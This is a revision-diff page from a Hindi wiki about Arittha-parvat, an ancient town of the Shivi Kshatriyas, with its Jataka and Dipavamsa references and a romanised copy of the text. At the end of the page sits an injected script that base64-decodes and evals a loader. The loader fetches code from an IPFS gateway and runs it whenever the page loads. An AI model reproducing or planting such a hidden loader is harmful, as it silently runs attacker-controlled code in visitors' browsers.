Difference between revisions of "अरिट्ठपर्वत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{पुनरीक्षण}} *उम्मदन्तिजातक में शिविजाति के क्षत्रि...' के साथ नया पन्ना बनाया)
 
 
(4 intermediate revisions by 3 users not shown)
Line 1: Line 1:
{{पुनरीक्षण}}
+
'''अरिट्ठपर्वत''' एक प्राचीन नगर का नाम है। 'उम्मदन्तिजातक' में शिविजाति के [[क्षत्रिय|क्षत्रियों]] के इस नगर का उल्लेख है।
*उम्मदन्तिजातक में शिविजाति के क्षत्रियों के इस नगर का उल्लेख है।  
+
 
*शिविराष्ट्र की स्थिति संभवत: ज़िला झंग ([[पाकिस्तान]]) के अंतर्गत शोरकोट के प्रदेश में थी।  
+
*शिविराष्ट्र की स्थिति संभवत: [[झंग|ज़िला झंग]] ([[पाकिस्तान]]) के अंतर्गत [[शोरकोट]] के प्रदेश में थी।  
 
*इस उपकल्पना के आधार पर इस नगर की स्थिति इसी स्थान के आसपास मानी जा सकती है।  
 
*इस उपकल्पना के आधार पर इस नगर की स्थिति इसी स्थान के आसपास मानी जा सकती है।  
*[[दीपवंश]] 3, 14 में यहां के राजा सिट्ठी का उल्लेख है।  
+
*[[दीपवंश]]<ref>दीपवंश 3, 14</ref> में यहां के '''राजा सिट्ठी''' का उल्लेख है।  
  
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 +
*ऐतिहासिक स्थानावली | पृष्ठ संख्या= 38| विजयेन्द्र कुमार माथुर |  वैज्ञानिक तथा तकनीकी शब्दावली आयोग | मानव संसाधन विकास मंत्रालय, भारत सरकार
 
<references/>
 
<references/>
 
==बाहरी कड़ियाँ==
 
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{विदेशी स्थान}}
 
{{विदेशी स्थान}}
 
[[Category:ऐतिहासिक स्थान कोश]]
 
[[Category:ऐतिहासिक स्थान कोश]]
[[Category:विदेशी_स्थान]]
+
[[Category:विदेशी_स्थान]] [[Category:ऐतिहासिक स्थानावली]]
[[Category:नया पन्ना सितंबर-2011]]
 
 
 
 
__INDEX__
 
__INDEX__

Latest revision as of 11:41, 3 May 2018

aritthaparvat ek prachin nagar ka nam hai. 'ummadantijatak' mean shivijati ke kshatriyoan ke is nagar ka ullekh hai.

  • shivirashtr ki sthiti sanbhavat: zila jhang (pakistan) ke aantargat shorakot ke pradesh mean thi.
  • is upakalpana ke adhar par is nagar ki sthiti isi sthan ke asapas mani ja sakati hai.
  • dipavansh[1] mean yahaan ke raja sitthi ka ullekh hai.

tika tippani aur sandarbh

  • aitihasik sthanavali | prishth sankhya= 38| vijayendr kumar mathur | vaijnanik tatha takaniki shabdavali ayog | manav sansadhan vikas mantralay, bharat sarakar
  1. dipavansh 3, 14

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>